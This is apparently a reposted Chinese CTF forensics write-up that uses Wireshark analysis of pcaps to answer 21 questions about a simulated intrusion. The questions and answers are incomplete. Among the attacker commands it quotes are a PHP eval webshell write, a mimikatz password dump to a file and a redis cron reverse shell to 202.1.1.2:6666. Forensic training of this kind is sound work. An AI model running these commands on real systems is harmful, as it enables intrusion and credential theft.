鏈接: https://pan.baidu.com/s/145V_xyiMNOIE5bFbCTtNNg 密碼: v6wu

1.被攻擊的兩個服務(wù)器的內(nèi)網(wǎng)ip分別是多少，以下簡稱服務(wù)器1和2(格式：空格分隔，按黑客攻擊順序排列） 2.兩臺服務(wù)器的主機(jī)名分別是什么 3.黑客使用了什么工具對服務(wù)器1進(jìn)行的攻擊(小寫) 4.黑容成功登陸網(wǎng)站后臺的賬號密碼以及驗證碼是什么(格式user/pass/vcode) 5.黑客向服務(wù)器1寫入webshell的具體命令是什么(url解碼后) 6.服務(wù)器1都開啟了哪些允許外連的TCP注冊端口(端口號從小到大，用空格間隔) 7.服務(wù)器1安裝的修補(bǔ)程序名稱 8.網(wǎng)站根目錄的絕對路徑(注意：大寫，左斜杠，最后要有一個斜杠) 9.黑客使用什么命令或文件進(jìn)行的內(nèi)網(wǎng)掃描 10.掃描結(jié)果中服務(wù)器2開放了哪些端口(端口號從小到大，用空格隔開) 11.黑客執(zhí)行的什么命令將administrator的密碼保存到文件中 12.服務(wù)器1的系統(tǒng)管理員administrator的密碼是什么 13.黑客進(jìn)行內(nèi)外掃描的ip范圍(格式:xx.xx.xx.xx~xx.xx.xx.xx) 14.服務(wù)器1的mysql的root用戶的密碼是什么 15.黑客在服務(wù)器2中查看了哪個敏感文件(拿到shell之后)，請寫出絕對路徑 16.服務(wù)器2的web網(wǎng)站后臺賬號密碼(格式:賬號/密碼) 17.黑客在redis未授權(quán)訪問中反彈shell的ip和端口是多少 18.黑客拿到root權(quán)限后執(zhí)行的第二條命令是什么 19.服務(wù)器2的root用戶密碼是什么 20.黑客向服務(wù)器2寫入webshell的命令 21.pcap中哪些ip發(fā)送過無償ARP包(空格分隔，時間順序排序)

1.被攻擊的兩個服務(wù)器的內(nèi)網(wǎng)ip分別是多少，以下簡稱服務(wù)器1和2(格式：空格分隔，按黑客攻擊順序排列）??

數(shù)據(jù)包1

http

攻擊者ip 202.1.1.2 服務(wù)器1ip 192.168.1.74? 服務(wù)器2ip 見下面分析

2.兩臺服務(wù)器的主機(jī)名分別是什么??

找phpinfo

http contains "phpinfo"

數(shù)據(jù)包二中找到

將返回的phpinfo源碼復(fù)制到新建的html中，保存后打開

可以看到服務(wù)器1的主機(jī)名?TEST-7E28AF8836

在后續(xù)的數(shù)據(jù)包中繼續(xù)過濾

ip.addr == 192.168.2.66 && http contains "phpinfo"

?

3.黑客使用了什么工具對服務(wù)器1進(jìn)行的攻擊(小寫)?

sqlmap

4.黑容成功登陸網(wǎng)站后臺的賬號密碼以及驗證碼是什么(格式user/pass/vcode)??

ip.addr == 192.168.1.74 && ip.addr ==202.1.1.2 &&http

發(fā)現(xiàn)數(shù)據(jù)包1中，一直在跑sqlmap

數(shù)據(jù)包2中，跑完sqlmap后開始掃目錄

掃到后臺后，開始登陸，看到下面返回admin后臺相關(guān)的內(nèi)容，說明此處提交的user和pwd正確

5.黑客向服務(wù)器1寫入webshell的具體命令是什么(url解碼后)??

數(shù)據(jù)包二的最下面發(fā)現(xiàn)多了個，abc.php，應(yīng)該不是網(wǎng)站本身的文件，看到上面通過php命令執(zhí)行寫的shell

http://202.1.1.1/tmpbjhbf.php?cmd=echo ^<?php^ eval($_POST[ge]);?^>>abc.php

?6.服務(wù)器1都開啟了哪些允許外連的TCP注冊端口(端口號從小到大，用空格間隔)??

查看abc.php的請求包都是b64，所以abc.php菜刀一句話呀

總是b64decode太麻煩，不如看對應(yīng)的返回包，大致能猜出菜刀做了什么操作

接著數(shù)據(jù)包3

菜刀上傳了scan.php掃內(nèi)網(wǎng)

tunel.nosoket.php作為內(nèi)網(wǎng)代理

mimi下的mimikatz.exe用來dump服務(wù)器1的密碼

可以看到服務(wù)器1開放的端口有80 135 445 1025 3306 3389 139

TCP注冊端口(小于1024)

所以服務(wù)器1允許外連的TCP注冊端口為80 135 139 445

這時候需要Google搞明白這幾個端口是干啥用的。。

緊接著菜刀執(zhí)行了systeminfo

返回

服務(wù)器1為Windows,修補(bǔ)程序Q147222

scan.php 掃描內(nèi)網(wǎng) 192.168.1.1~192.168.3.255? 掃描端口 21,80,8080,1433,3306,6379

追蹤tcp流查看返回

<br/>Scanning IP 192.168.1.1<br/> Port: 80 is open<br/> <br/>Scanning IP 192.168.1.8<br/> Port: 80 is open<br/> Port: 3306 is open<br/> <br/>Scanning IP 192.168.1.33<br/> 17Port: 3306 is open<br/> <br/>Scanning IP 192.168.1.74<br/> Port: 80 is open<br/> Port: 3306 is open<br/> <br/>Scanning IP 192.168.1.159<br/> Port: 80 is open<br/> Port: 8080 is open<br/> Port: 3306 is open<br/><br/>Scanning IP 192.168.1.169<br/> 15 Port: 80 is open<br/> 17 Port: 3306 is open<br/>21 <br/>Scanning IP 192.168.2.1<br/> 15 Port: 80 is open<br/> 21<br/>Scanning IP 192.168.2.20<br/> 15 Port: 80 is open<br/> 17 Port: 3306 is open<br/> 2222 <br/>Scanning IP 192.168.2.66<br/> 15 Port: 80 is open<br/> 17 Port: 3306 is open<br/> 17 Port: 6379 is open<br/> 2222 <br/>Scanning IP 192.168.2.88<br/> 15 Port: 21 is open<br/> 15 Port: 80 is open<br/> 17 Port: 3306 is open<br/> 2221 <br/>Scanning IP 192.168.3.1<br/> 15 Port: 80 is open<br/><br/>Scanning IP 192.168.3.6<br/> 15 Port: 80 is open<br/> 17 Port: 3306 is open<br/> 21

7.服務(wù)器1安裝的修補(bǔ)程序名稱? ? 從systeminfo返回可看出

8.網(wǎng)站根目錄的絕對路徑(注意：大寫，左斜杠，最后要有一個斜杠)? ? phpinfo 可找到

?9.黑客使用什么命令或文件進(jìn)行的內(nèi)網(wǎng)掃描? ? ?scan.php

10.掃描結(jié)果中服務(wù)器2開放了哪些端口(端口號從小到大，用空格隔開)??

?前面只掃了192.168.1.1-192.168.3.255 說明服務(wù)器2就從這個網(wǎng)段之間，并且有端口開放的那幾個之間選擇。。

數(shù)據(jù)包四

所以服務(wù)器2 ip 192.168.2.66

從上面scan.php返回結(jié)果可知，掃描結(jié)果中服務(wù)器2開放了80 3306 6379

11.黑客執(zhí)行的什么命令將administrator的密碼保存到文件中??

?返回數(shù)據(jù)包3，黑客用mimikatz dump下服務(wù)器已的密碼

說明將administrator的密碼保存到文件中 的操作就在這附近

cd /d "C:\WWW\my\mimi\"&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> log.txt&echo [S]&cd&echo [E]

12.服務(wù)器1的系統(tǒng)管理員administrator的密碼是什么?

從上面mimiditz的log可知administrator的密碼為Simplexue123?

13.黑客進(jìn)行內(nèi)外掃描的ip范圍(格式:xx.xx.xx.xx~xx.xx.xx.xx) 192.168.1.1~192.168.3.255

14.服務(wù)器1的mysql的root用戶的密碼是什么??

mysql相關(guān)信息一般都存在config配置文件中

可以http過濾后查看113060到472649之間的config請求包及respone,或者直接過濾root

http contains "root"

15.黑客在服務(wù)器2中查看了哪個敏感文件(拿到shell之后)，請寫出絕對路徑

數(shù)據(jù)包5

tcp and !(tcp.port == 80) and !(tcp.port == 443) and !(tcp.stream eq 98) and ip.addr == 202.1.1.2

追蹤tcp流

可看到絕對路徑/var/www/html/

16.服務(wù)器2的web網(wǎng)站后臺賬號密碼(格式:賬號/密碼)

http contains "admin" ||http contains "pass"

服務(wù)器2開啟的6379端口應(yīng)該是redis的，貌似黑客通過redis未授權(quán)訪問拿到shell然后進(jìn)行后續(xù)操作的。

那么應(yīng)該過濾tcp.port == 6379

數(shù)據(jù)包4內(nèi)沒有相關(guān)內(nèi)容

數(shù)據(jù)包5

* * * * * bash -i >& /dev/tcp/202.1.1.2/6666 0>&1

so黑客在redis未授權(quán)訪問中反彈shell的ip和端口是202.1.1.2和6666

18.黑客拿到權(quán)限后執(zhí)行的第二條命令是什么?

cd /var/www/html

19.服務(wù)器2的root用戶密碼是什么

?

20.黑客向服務(wù)器2寫入webshell的命令

21.pcap中哪些ip發(fā)送過無償ARP包(空格分隔，時間順序排序)

?無償arp包，可以發(fā)現(xiàn)isgratuitous必須為true。利用規(guī)則arp.isgratuitous == true可以找到數(shù)據(jù)包。。。

不過，我還是沒找到。。。

?

轉(zhuǎn)載于:https://www.cnblogs.com/1go0/p/10065813.html

總結(jié)

以上是生活随笔為你收集整理的2018.6.1信息安全铁人三项赛数据赛writeup的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。